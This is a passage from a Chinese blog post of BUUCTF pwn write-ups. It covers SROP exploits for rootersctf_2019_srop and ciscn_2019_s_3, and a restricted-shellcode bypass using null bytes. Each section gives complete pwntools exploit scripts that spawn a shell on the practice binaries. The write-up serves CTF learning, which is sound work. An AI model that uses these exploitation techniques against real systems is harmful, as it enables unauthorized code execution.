class="string">&quot;amd64&quot;</span>)</span><br><span class="line">frame.rax = constants.SYS_read <span class="comment"># read </span></span><br><span class="line">frame.rdi = <span class="number">0</span> <span class="comment"># stdin</span></span><br><span class="line">frame.rsi = data_addr</span><br><span class="line">frame.rdx = <span class="number">0x400</span></span><br><span class="line">frame.rip = syscall_leave_ret</span><br><span class="line">frame.rbp = data_addr </span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x80</span>+<span class="number">8</span>) + p64(pop_rax_syscall_leave_ret) + p64(<span class="number">15</span>) + <span class="built_in">bytes</span>(frame)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">frame = SigreturnFrame(kernel=<span class="string">&quot;amd64&quot;</span>)</span><br><span class="line">frame.rax = constants.SYS_execve <span class="comment"># execve </span></span><br><span class="line">frame.rdi = data_addr <span class="comment"># stdin</span></span><br><span class="line">frame.rsi = <span class="number">0</span></span><br><span class="line">frame.rdx = <span class="number">0</span></span><br><span class="line">frame.rip = syscall_addr</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span> + p64(pop_rax_syscall_leave_ret)</span><br><span class="line">payload += p64(<span class="number">15</span>) + <span class="built_in">bytes</span>(frame)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="3-ciscn-2019-s-3"><a href="#3-ciscn-2019-s-3" class="headerlink" title="3.ciscn_2019_s_3"></a>3.ciscn_2019_s_3</h2><p>借鉴文章</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_55368674/article/details/129103883?fromshare=blogdetail&sharetype=blogdetail&sharerId=129103883&sharerefer=PC&sharesource=2401_86608136&sharefrom=from_link">https://blog.csdn.net/m0_55368674/article/details/129103883?fromshare=blogdetail&amp;sharetype=blogdetail&amp;sharerId=129103883&amp;sharerefer=PC&amp;sharesource=2401_86608136&amp;sharefrom=from_link</a></p>
<p>前提：这道题的前置条件是libc是ubuntu18，先要将elf文件的libc.so文件先换掉，命令如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">patchelf --replace-needed libc.so.6 /home/zzt/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6 ciscns3</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">patchelf --set-interpreter /home/zzt/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/ld-linux-x86-64.so.2    ./ciscns3</span><br></pre></td></tr></table></figure>



<p>1.首先还是先checksec一下，去查看一下这道题的保护机制，我们可以看到只开启了nx保护</p>
<p><img src="/../images/image-20250714111723613.png" alt="image-20250714111723613"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>2.我们可以从上述看到这是一个64位程序拖入ida中进行反编译查看源码</p>
<p>main</p>
<p><img src="/../images/image-20250714111730895.png" alt="image-20250714111730895"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>vuln</p>
<p><img src="/../images/image-20250714111737868.png" alt="image-20250714111737868"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>sub_4004E2</p>
<p><img src="/../images/image-20250714111747327.png" alt="image-20250714111747327"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/image-20250714111753547.png" alt="image-20250714111753547"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>gadgets</p>
<p><img src="/../images/image-20250714111811387.png" alt="image-20250714111811387"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/image-20250714111818365.png" alt="image-20250714111818365"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>我们还可以看到ida反汇编里又sub_4004E2和gadgets是可以利用的，那我们就有两种方法去写这一道题，第一种方法就是利用gadgets去构造srop，第二种利用execve构造csu。我们还可以提取到的信息是read读入0x400个字节，并且这个程序是没有这个bin&#x2F;sh&#x2F;地址，但是我们可以看到这是先读再写并且写出的区间是比读入的区间大的，那么是不是有泄露信息的可能。那我们就有了一个思路，将&#x2F;bin&#x2F;sh字符串写入程序，这样程序就有了&#x2F;bin&#x2F;sh字符串的地址了，然后通过srop的系统调用进行调用，至此我们理论上就构造了一个execve（&#x2F;bin&#x2F;sh，0，0）；</p>
<p>构造&#x2F;bin&#x2F;sh字符串并获取其地址<br>思路:利用栈溢出首先利用本题的sys_read去读一个&#x2F;bin&#x2F;sh，但是需要我们leak出字符串在栈中的地址，因为栈中的位置都是通过偏移确定的，所以要确定栈偏移。</p>
<p>找偏移一般先确定栈的地址然后在确定字符串在栈中的地址：<br>栈地址-字符串在栈中的地址 &#x3D; offset<br>每次在运行程序中，字符串相对于栈基地址的offset是相同的</p>
<p>在main函数开始时rsi存的便是栈地址，我们通过GDB来调试查看，栈基地址为de98。</p>
<p><img src="/../images/image-20250714111828025.png" alt="image-20250714111828025"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>接着我们使用<code>s</code>或<code>step</code>命令接着运行，输入字符串<code>/bin/sh</code>，然后使用<code>search</code>功能搜索字符串，找到我们输入的字符串在栈上的位置，可以看到地址为<code>dd80</code>。</p>
<p><img src="/../images/image-20250714111836067.png" alt="image-20250714111836067"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/image-20250714111844197.png" alt="image-20250714111844197"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>由此可见输入位置距离栈基址是118个偏移</p>
<p>这时候我们查看一下&#x2F;bin&#x2F;sh字符串附近的内容，看到我们的基地址<code>e058</code>在相对偏移为0x20的地方，IDA中我们之前看到，<code>write</code>系统调用打印出了0x30个字节的数据，这说明我们可以接受到输出的基地址。</p>
<p><img src="/../images/image-20250714111906423.png" alt="image-20250714111906423"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>实际上这一步我们的最终目标是要找到&#x2F;bin&#x2F;sh字符串的地址，明显的程序中只有一个write函数进行了输出，我们的思路就是从输出的这0x30个字节中，找到可以用来计算&#x2F;bin&#x2F;sh地址的部分。最终，我们挑选的就是栈基地址 de98 。这个栈基地址是怎么被发现的，暂不清楚。</p>
<p><strong>使用pwntools中的SigreturnFrame函数构造帧</strong><br>       ROP方法的思路都是通过gadgets设置寄存器的值来实现漏洞利用的，SROP也是从属于ROP方法中的一员。它利用了Linux系统信号处理过程中的漏洞，即在信号处理过程中会将用户态上下文环境及寄存器的值保存在用户态的栈中，处理完后再读取栈中的数据恢复寄存器的值。sigreturn系统调用就是处理完后那一阶段执行的系统调用，它会读取当前栈空间中的数据作为寄存器的值。因此这里我们利用栈溢出漏洞和sigreturn系统调用就可以实现SROP的攻击方法。首先利用栈溢出将返回地址设置为实现sigreturn系统调用的gadget，然后再将其后面的栈空间布置成我们想要设置的寄存器的值。待sigreturn系统调用执行完毕，此时的寄存器值，包括RSP&#x2F;ESP和RIP&#x2F;EIP都会被改变，所以SROP强大之处就是改变了所有的寄存器，这可以让我们实现任何想要的系统调用，但附带效果就是会改变栈顶指针RSP&#x2F;ESP，有时候这并不是我们想要的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">frame = SigreturnFrame(kernel=<span class="string">&quot;amd64&quot;</span>)</span><br><span class="line">frame.rax = constants.SYS_execve <span class="comment"># execve </span></span><br><span class="line">frame.rdi =  binsh_addr</span><br><span class="line">frame.rsi = <span class="number">0</span></span><br><span class="line">frame.rdx = <span class="number">0</span></span><br><span class="line">frame.rip = syscall</span><br></pre></td></tr></table></figure>

<p>完整exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./ciscns3&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p=remote(&#x27;)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pop_rax_ret = <span class="number">0x4004DA</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">.text:00000000004004DA                 mov     rax, 0Fh</span></span><br><span class="line"><span class="string">.text:00000000004004E1                 retn</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">syscall= <span class="number">0x400517</span></span><br><span class="line"></span><br><span class="line">data_addr = <span class="number">0x601000</span></span><br><span class="line">main = <span class="number">0x4004ED</span></span><br><span class="line">vul_addr = <span class="number">0x4004ed</span></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span> + <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x8</span> + p64(<span class="number">0x4004f1</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recv(<span class="number">0x20</span>)</span><br><span class="line"><span class="comment">#这里是接收0x20字节之后，再接收0x8的字节也就是栈地址</span></span><br><span class="line">binsh_addr = u64(p.recv(<span class="number">0x8</span>)) - <span class="number">0x118</span>	</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&#x27;stack_addr: &#x27;</span> + <span class="built_in">hex</span>(binsh_addr+<span class="number">0x118</span>))</span><br><span class="line">log.success(<span class="string">&#x27;/bin/sh_offset_addr: &#x27;</span> + <span class="built_in">hex</span>(binsh_addr))</span><br><span class="line"></span><br><span class="line">frame = SigreturnFrame(kernel=<span class="string">&quot;amd64&quot;</span>)</span><br><span class="line">frame.rax = constants.SYS_execve <span class="comment"># execve </span></span><br><span class="line">frame.rdi =  binsh_addr</span><br><span class="line">frame.rsi = <span class="number">0</span></span><br><span class="line">frame.rdx = <span class="number">0</span></span><br><span class="line">frame.rip = syscall</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;c&#x27;</span>*<span class="number">0x10</span> + p64(pop_rax_ret) + p64(syscall) + <span class="built_in">bytes</span>(frame)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="4-有限制的shellcode"><a href="#4-有限制的shellcode" class="headerlink" title="4.有限制的shellcode"></a>4.有限制的shellcode</h2><p>今天在buuctf平台上刷到一题，是一道有限制的shellcode，</p>
<p><img src="/../images/image-20250714111921035.png" alt="image-20250714111921035"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>这个题目限制如下</p>
<p><img src="/../images/image-20250714111933764.png" alt="image-20250714111933764"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/image-20250714111942615.png" alt="image-20250714111942615"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>那么看到这里，我们是不是有一个疑问，为什么要用\x00绕过呢</p>
<p>al是这么解答的</p>
<p><img src="/../images/image-20250714111953369.png" alt="image-20250714111953369"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/image-20250714112003561.png" alt="image-20250714112003561"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>我的理解是\x00就是提前截断内容，让他停止检测，然后我就可以输入任何恶意指令，而两个\x00是为了确保程序被截断，但是我尝试了一下，一个\x00是不会被执行的</p>
<p>是这样的</p>
<p>#\x00B后面加上一个字符，对应一个汇编语句。所以我们可以通过\x00B\x22、\x00B\x00 、\x00J\x00等等来绕过那个检查<br>#b”\x00\xc0”(64)</p>
<p>也就是对应这句汇编语言</p>
<p><img src="/../images/image-20250714112013212.png" alt="image-20250714112013212"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>所以我们使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b&#x27;\x00J&#x27;+b&#x27;\x00&#x27;</span><br></pre></td></tr></table></figure>

<p>是为了组成一句合法的汇编语言，然后加上机器生成的shellcode执行就可以，这道题主要就是一个难点，如何截断这个检查，去输入恶意指令，拿到shell。</p>
<p>最后exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch=<span class="string">&quot;amd64&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># p=remote(&#x27;node5.buuoj.cn&#x27;,28028)</span></span><br><span class="line"></span><br><span class="line">p=process(<span class="string">&#x27;./babyshell&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode=<span class="string">b&#x27;\x00J&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>+asm(shellcraft.sh())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

</article>
    
    <div class="trm-reward">
        
            <span class="trm-reward-btn trm-glow" onclick='var qr = document.getElementById("qr"); qr.style.display = (qr.style.display === "none") ? "block" : "none";'>
                <i class="iconfont fas fa-hand-holding-usd"></i>
            </span>
        
        <p class="trm-reward-comment">I'm so cute. Please give me money.</p>
        <div id="qr" style="display:none;">
            
                <div style="display:inline-block">
                    <a rel="noopener noreferrer" href='zhifubao.png' target='_blank' >
                       <img src="/zhifubao.png" alt="支付宝" loading="lazy">
                    </a>
                    <p>支付宝</p>
                </div>
            
                <div style="display:inline-block">
                    <a rel="noopener noreferrer" href='weixin.png' target='_blank' >
                       <img src="/weixin.png" alt="微信" loading="lazy">
                    </a>
                    <p>微信</p>
                </div>
            
        </div>
    </div>

    

<ul class="trm-post-copyright">
    <li class="trm-post-copyright-author">
        <strong>本文作者：</strong>
        enp0
    </li>
    <li class="trm-post-copyright-link">
        <strong>本文链接：</strong>
        <a id="original-link" href="https://www.imalun.com/2025/07/14/buu刷题路/" title="buu刷题路">https://www.imalun.com/2025/07/14/buu刷题路/</a>
    </li>
    <li class="trm-post-copyright-license">
        <strong>版权声明：</strong>
        本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 ">CC BY-NC-SA 4.0</a> 许可协议。
    </li>
</ul>


</div>
<div class="trm-post-next-prev row">
    <div class="col-lg-12">
        <!-- title -->
        <h5 class="trm-title-with-divider">
            其他文章
            <span data-number="02"></span>
        </h5>
    </div>
    
        <div class="col-lg-6">
    <div class="trm-blog-card trm-scroll-animation">
        <a href="/2025/07/15/pwn%E5%88%9D%E5%AD%A6%E6%8C%87%E5%8D%97/" class="trm-cover-frame trm-anima-link">
            
            
                <img alt="cover" class="no-fancybox" src="/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91Chris%E6%8F%92%E7%94%BB-%E6%8F%92%E7%94%BB.png">
            
        </a>
        
        <div class="trm-card-descr">
            <div class="trm-label trm-category trm-mb-20">
                <a href=" /categories/%E3%80%8A%E4%BB%8E0%E5%88%B0%E6%9C%89pwn%E5%AD%A6%E4%B9%A0%E7%B3%BB%E5%88%97%E3%80%8B/">
                    《从0到有pwn学习系列》
                </a>
            </div>
            <h5>
                <a href="/2025/07/15/pwn%E5%88%9D%E5%AD%A6%E6%8C%87%E5%8D%97/" class="trm-anima-link">
                    pwn初学指南
                </a>
            </h5>
            <div class="trm-divider trm-mb-20 trm-mt-20"></div>
            <ul class="trm-card-data trm-label">
                <li>25/07/15</li>
                <li>15:51</li>
                
                    <li>2.8k</li>
                
                
                    <li>9</li>
                
            </ul>
        </div>
    </div>
</div>
    
    
        <div class="col-lg-6">
    <div class="trm-blog-card trm-scroll-animation">
        <a href="/2025/07/11/PWN%E9%A2%98GDB%E8%B0%83%E8%AF%95%E6%8C%87%E5%8D%97/" class="trm-cover-frame trm-anima-link">
            
            
                <img alt="cover" class="no-fancybox" src="/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%A2%A8%E4%BE%A0%E5%AE%A2%E8%A1%8C-%E6%8F%92%E7%94%BB.png">
            
        </a>
        
        <div class="trm-card-descr">
            <div class="trm-label trm-category trm-mb-20">
                <a href=" /categories/%E3%80%8A%E4%BB%8E0%E5%88%B0%E6%9C%89pwn%E5%AD%A6%E4%B9%A0%E7%B3%BB%E5%88%97%E3%80%8B/">
                    《从0到有pwn学习系列》
                </a>
            </div>
            <h5>
                <a href="/2025/07/11/PWN%E9%A2%98GDB%E8%B0%83%E8%AF%95%E6%8C%87%E5%8D%97/" class="trm-anima-link">
                    PWN题GDB调试指南
                </a>
            </h5>
            <div class="trm-divider trm-mb-20 trm-mt-20"></div>
            <ul class="trm-card-data trm-label">
                <li>25/07/11</li>
                <li>15:49</li>
                
                    <li>3.4k</li>
                
                
                    <li>12</li>
                
            </ul>
        </div>
    </div>
</div>
    
</div>

    



                    <div class="trm-divider footer-divider"></div>

                    <!-- footer -->
                    <footer class="trm-footer-card trm-scroll-animation">

    

    
        <div class="trm-footer-item">
            <span>© 2025 - 2025</span>
            <span class="footer-separator"data-separator=" · "></span>
            <span class="trm-accent-color">enp0</span>
        </div>
    

    
        <div class="trm-footer-item">
            <span>
                由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0
            </span>
            <span class="footer-separator" data-separator=" | "></span>
            <span> 
                主题 - 
                <a rel="noopener" href='https://github.com/MaLuns/hexo-theme-async' target='_blank'>Async</a>
                v2.2.6
            </span>
        </div>
      

    
        <div class="trm-footer-item blog-run-long"></div>
     

     
</footer>
                    <!-- footer end -->

                </div>
            </div>
        </div>
    </div>
</div>
            <!-- body end -->

            

    <div id="post-toc" class="trm-post-toc">
      <div class="trm-post-toc-header">
        目录导航
				<span id="post-toc-top">
					置顶
				</span>
      </div>
      <div class="trm-post-toc-content">
        <ol class="trm-toc"><li class="trm-toc-item trm-toc-level-1" title="buu刷题路"><a rel="nofollow" class="trm-toc-link" href="#buu刷题路"><span class="trm-toc-number">1.</span> <span class="trm-toc-text">buu刷题路</span></a><ol class="trm-toc-child"><li class="trm-toc-item trm-toc-level-2" title="1.inndy_echo 1"><a rel="nofollow" class="trm-toc-link" href="#1-inndy-echo-1"><span class="trm-toc-number">1.1.</span> <span class="trm-toc-text">1.inndy_echo 1</span></a></li><li class="trm-toc-item trm-toc-level-2" title="2.rootersctf_2019_srop"><a rel="nofollow" class="trm-toc-link" href="#2-rootersctf-2019-srop"><span class="trm-toc-number">1.2.</span> <span class="trm-toc-text">2.rootersctf_2019_srop</span></a></li><li class="trm-toc-item trm-toc-level-2" title="3.ciscn_2019_s_3"><a rel="nofollow" class="trm-toc-link" href="#3-ciscn-2019-s-3"><span class="trm-toc-number">1.3.</span> <span class="trm-toc-text">3.ciscn_2019_s_3</span></a></li><li class="trm-toc-item trm-toc-level-2" title="4.有限制的shellcode"><a rel="nofollow" class="trm-toc-link" href="#4-有限制的shellcode"><span class="trm-toc-number">1.4.</span> <span class="trm-toc-text">4.有限制的shellcode</span></a></li></ol></li></ol>
      </div>
    </div>

            
<div class="trm-fixed-container">
    
        <div class="trm-fixed-btn post-toc-btn" data-title="目录">
            <i class="iconfont fas fa-th-list"></i>
        </div>
    
    
        <div class="trm-fixed-btn" data-title="阅读模式" onclick="asyncFun.switchReadMode()">
            <i class="iconfont fas fa-book-reader"></i>
        </div>
    
    
        <div class="trm-fixed-btn hidden-md" data-title="单栏和双栏切换" onclick="asyncFun.switchSingleColumn()">
            <i class="iconfont fas fa-arrows-alt-h"></i>
        </div>
    
    <div id="trm-back-top" class="trm-fixed-btn" data-title="回到顶部">
        <i class="iconfont fas fa-arrow-up"></i>
    </div>
</div>
        </div>
      </div>
      <!-- scroll container end -->
  </div>
  <!-- app wrapper end -->

  
  <!-- Plugin -->




    
    
<script src="https://npm.elemecdn.com/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>

    

    
        <script src="/js/plugins/typing.js?v=2.2.6"></script>
    

    

    <!-- 数学公式 -->
    

    <!-- 评论插件 -->
    
        

        
    

		




    <!-- Service Worker -->
    
    <!-- baidu push -->
    
    <script data-swup-reload-script>
        (function () {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            }
            else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script>



<script id="async-script" src="/js/main.js?v=2.2.6"></script>

<!-- CDN -->


    
<script src="/demo.js"></script>


    

    



</body>

</html>